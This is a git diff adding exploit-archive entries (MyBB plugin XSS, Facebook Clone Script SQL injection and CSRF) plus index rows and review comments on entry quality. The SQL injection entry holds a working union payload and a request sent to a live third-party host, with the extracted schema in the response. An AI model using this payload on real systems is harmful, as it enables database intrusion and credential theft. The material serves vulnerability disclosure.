+ + +################################################################################ \ No newline at end of file diff --git a/exploits/php/webapps/44795.txt b/exploits/php/webapps/44795.txt new file mode 100644 index 000000000..97ca5086d --- /dev/null +++ b/exploits/php/webapps/44795.txt @@ -0,0 +1,25 @@ +# Exploit Title: MyBB ChangUonDyU Advanced Statistics Plugin v1.0.2 - Cross-Site Scripting +# Date: 5/25/2018 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Contact: 0xB9[at]pm.me +# Software Link: https://community.mybb.com/mods.php?action=view&pid=1125 +# Version: 1.0.2 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2018-11532 + + +1. Description: +This plugin displays advanced statistics on the index page such as latest posts with auto refresh using AJAX. + + + +2. Proof of Concept: +Create a new thread with the following payload as the title + +The alert will appear on the index page + + + +3. Solution: +Update to the latest release \ No newline at end of file diff --git a/exploits/php/webapps/44799.txt b/exploits/php/webapps/44799.txt new file mode 100644 index 000000000..59cfae12e --- /dev/null +++ b/exploits/php/webapps/44799.txt 
@@ -0,0 +1,46 @@ +# Exploit Title: Facebook Clone Script 1.0.5 - 'search' SQL Injection +# Date: 2018-05-29 +# Exploit Author: L0RD +# Vendor Homepage: https://www.phpscriptsmall.com/product/facebook-clone/ +# Version: 1.0.5 +# Tested on: Win 10 + +# POC : SQLi : + +# Parameter : search +# Type : Union based +# Payload : +1' UNION SELECT NULL,group_concat(table_name,0x3a,column_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL +from information_schema.columns where table_schema=schema()# + +# Request + +POST /demo/fbclone/top-search.php HTTP/1.1 +Host: smsemailmarketing.in +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) +Gecko/20100101 Firefox/61.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://smsemailmarketing.in/demo/fbclone/setting.php +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Content-Length: 231 +Connection: keep-alive + +search=1' UNION SELECT NULL,group_concat(table_name,0x3C62723E,column_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL +from information_schema.columns where table_schema=schema()# + +# Response + +HTTP/1.1 200 OK +Server: nginx/1.12.2 +Date: Tue, 29 May 2018 17:12:31 GMT +Content-Type: text/html; charset=UTF-8 +Connection: keep-alive +Content-Length: 5370 + +About_you:a_id,about_you:u_id,about_you:u_nick,about_you:u_nickname,about_you:u_nick_show,about_you:nick_privacy,admin:id,admin:name,admin:username,admin:password,admin:ref_password,admin:sex,admin:email_id,admin:valid_id,admin:user_type,admin:user_level,admin:city_code,admin:state_code,admin:country_code,admin:userimages,admin:description + \ No newline at end of file diff --git a/exploits/php/webapps/44800.txt b/exploits/php/webapps/44800.txt new file mode 100644 index 000000000..de22b2703 --- /dev/null +++ b/exploits/php/webapps/44800.txt 
@@ -0,0 +1,28 @@ +# Exploit Title: Facebook Clone Script 1.0.5 - Cross-Site Request Forgery +# Date: 2018-05-29 +# Exploit Author: L0RD +# Vendor Homepage: https://www.phpscriptsmall.com/product/facebook-clone/ +# Version: 1.0.5 +# Tested on: Win 10 + +# Description : +# Facebook Clone Script 1.0.5 has csrf vulnerability which attacker can +# easily change user information . + +# POC : + + + + Change information + + + + + + +
+ + + \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 2b3689d22..d5f29d507 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9746,6 +9746,8 @@ id,file,description,date,author,type,platform,port 44750,exploits/linux/local/44750.txt,"GNU glibc < 2.27 - Local Buffer Overflow",2018-05-24,JameelNabbo,local,linux, 44776,exploits/android/local/44776.txt,"Werewolf Online 0.8.8 - Information Disclosure",2018-05-27,ManhNho,local,android, 44787,exploits/windows_x86/local/44787.py,"ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)",2018-05-28,"Gokul Babu",local,windows_x86, +44797,exploits/linux/local/44797.txt,"GNU Barcode 0.99 - Buffer Overflow",2018-05-29,LiquidWorm,local,linux, +44798,exploits/linux/local/44798.txt,"GNU Barcode 0.99 - Memory Leak",2018-05-29,LiquidWorm,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 
@@ -39461,3 +39463,10 @@ id,file,description,date,author,type,platform,port 44788,exploits/php/webapps/44788.html,"Joomla! Component jCart for OpenCart 2.3.0.2 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php, 44789,exploits/php/webapps/44789.html,"Joomla! Component JoomOCShop 1.0 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php, 44790,exploits/php/webapps/44790.txt,"wityCMS 0.6.1 - Cross-Site Scripting",2018-05-28,"Nathu Nandwani",webapps,php, +44792,exploits/asp/webapps/44792.txt,"IssueTrak 7.0 - SQL Injection",2018-05-29,"Chris Anastasio",webapps,asp, +44793,exploits/php/webapps/44793.txt,"Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection",2018-05-29,"Divya Jain",webapps,php, +44794,exploits/hardware/webapps/44794.txt,"NUUO NVRmini2 / NVRsolo - Arbitrary File Upload",2018-05-29,M3@Pandas,webapps,hardware, +44795,exploits/php/webapps/44795.txt,"MyBB ChangUonDyU Plugin 1.0.2 - Cross-Site Scripting",2018-05-29,0xB9,webapps,php, +44796,exploits/java/webapps/44796.txt,"Pivotal Spring Java Framework < 5.0 - Remote Code Execution",2018-05-29,JameelNabbo,webapps,java, +44799,exploits/php/webapps/44799.txt,"Facebook Clone Script 1.0.5 - 'search' SQL Injection",2018-05-29,L0RD,webapps,php, +44800,exploits/php/webapps/44800.txt,"Facebook Clone Script 1.0.5 - Cross-Site Request Forgery",2018-05-29,L0RD,webapps,php,
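Review bot: the Timeline in exploits/asp/webapps/44792.txt dates the PoC publication "2016-05-28", two years before the 2018-05-18 and 2018-05-21 entries above it and the "05-28-2018" in the header; it should read 2018-05-28. The same file spells the product both "Issue Trak" and "IssueTrak", has "reuslt" and "thsi" in the Notes and Timeline, and the Version line's "<= 7.0 extremely likely; up to 9.7 very likely" reads awkwardly next to the vendor statement that releases from 9.7 are not affected; saying plainly that only 7.0 was confirmed and 9.7+ is reported fixed would be clearer. The pre-authentication observation in Notes (IssueSearch_Process.asp queries the database before redirecting an unauthenticated caller to the login page) is the most important defensive fact in the entry and belongs in the header summary, since it means login hardening alone does not mitigate this and the upgrade is the fix.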
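Review bot: exploits/hardware/webapps/44794.txt says "As the code above, no any filter", but no excerpt from /upload.php appears above that sentence, so the root-cause evidence the advisory rests on is missing; either the PHP listing was lost when the file was committed or it was never included, and the file should be checked against the author's original before merge. The multipart body looks affected by the same loss (the PHP snippet in it is missing its tag delimiters). "Version: all" and "Tested on: PHP Linux" are too vague for a hardware entry; the firmware version actually tested should be named, and the header's "Software Link: N/A" could point at the vendor firmware page. Typo: "Recetly".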
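Review bot: the title in exploits/java/webapps/44796.txt says "< 5.0" while the "# Version:" line says "<= 5.0.x"; the two contradict each other and the CSV row copies the title, so one must be corrected before merge. "# CVE: CVE: CVE-2018-1270" has a doubled prefix. The description ("putting the key for 'selector' header, we can execute code on Spring") should say which Spring module evaluates the STOMP selector header and which release fixes it, neither of which the entry states; the PoC also calls setConnected and showGreeting, which come from the linked Spring guide and are not defined in the file, and should say so. Typo: "Here' we are writting".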
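Review bot: the Desc in exploits/linux/local/44797.txt claims "execution of arbitrary code", but the evidence in the file is an AddressSanitizer global-buffer-overflow READ of size 1 at code93.c:169, that is, an out-of-bounds read of shiftset2 indexed by (int)(text[i]) with no range check on the input character (and strchr() returning NULL for a character absent from alphabet would make the following pointer subtraction meaningless). What the report supports is a crash on a malicious input string; the severity should say denial of service, not code execution, and the fix direction is to reject characters outside the Code 93 alphabet before encoding. The roughly 150 lines of PostScript output between the command line and the sanitizer report carry no information and should be trimmed to the "==11076==ERROR" section.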
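Review bot: the Desc in exploits/linux/local/44798.txt says the leak is triggered "via a specially crafted file" and can cause a DoS, but the LeakSanitizer output attributes the 512-byte leak to the calloc() at cmdline.c:132, which the quoted excerpt shows runs unconditionally at the top of commandline() on every invocation, and the 55-byte leak to a strdup() with no barcode frame at all. Neither depends on the input file, and 567 bytes reclaimed at process exit is not a denial of service for a one-shot command-line tool; this is a code-quality bug (getopt_desc is never freed) and should be described as such, or dropped. As with the companion 44797 entry, the PostScript dump should be cut down to the sanitizer summary.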
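Review bot: the title in exploits/php/webapps/44793.txt says "Blind SQL Injection / XPath Injection", but the shown response returns the extracted value inside a visible "XPATH syntax error: '~id~'" warning, so this is error-based SQL injection (extractvalue() used as the error vector), not blind, and not an XPath injection in the application; the classification should be corrected so the entry is found under the right technique. The request also embeds a PHPSESSID and Google Analytics cookies captured against the vendor's live host, which should be scrubbed, and "Affected Link: demo.com/login-script-demo/users.php" does not match "Host: sitemakin.com". The RESPONSE block is mostly empty "+" lines where HTML markup was stripped; only the two Warning lines are meaningful and the rest should be removed.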
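Review bot: exploits/php/webapps/44795.txt never shows the payload it tells the reader to use ("Create a new thread with the following payload as the title" is followed by a blank line), so the PoC is unverifiable as committed, most likely because the markup was stripped; it needs to be restored in an escaped form that survives the CSV and web pipeline. "3. Solution: Update to the latest release" should name the fixed plugin version, and the Description should say which field (the thread title, per step 2) is rendered unescaped on the index page.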
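Review bot: in exploits/php/webapps/44799.txt the "# Payload :" section uses 0x3a as the separator while the request that follows uses 0x3C62723E; the two should match. The Response body reproduces the schema of a third-party demo host (smsemailmarketing.in) down to admin:password and admin:ref_password; the list adds nothing beyond confirming the injection and should be cut to a one-line confirmation, and the entry should say whether the vendor was contacted. The User-Agent header in the Request is wrapped across two lines, which would make it an invalid header if replayed verbatim.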
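Review bot: the POC in exploits/php/webapps/44800.txt consists only of the text "Change information"; the HTML form it is meant to be (target URL, method and the parameters that get changed) is absent, so the entry cannot be verified and should not be merged until the form is restored. The Description should also say which settings page accepts the request without an anti-CSRF token, since "attacker can easily change user information" is too vague to act on, and its grammar needs fixing ("has csrf vulnerability which attacker can easily change user information .").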
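Review bot: the files_exploits.csv descriptions do not match the file titles: 44792 is "IssueTrak 7.0" here but "Issue Trak <= 7.0 (Possibly applicable up to version 9.7)" in the file, 44796 keeps "< 5.0" while that file's Version line says "<= 5.0.x", and 44795 drops "Advanced Statistics" from the plugin name. The date column (2018-05-29 for every entry added) differs from the Date headers in the files (05-28-2018, 2018-05-20, 5/25/2018), which is acceptable if the column is the publication date, but the file headers should then use one date format. The hunk counts (+2 and +7 lines) match the rows added.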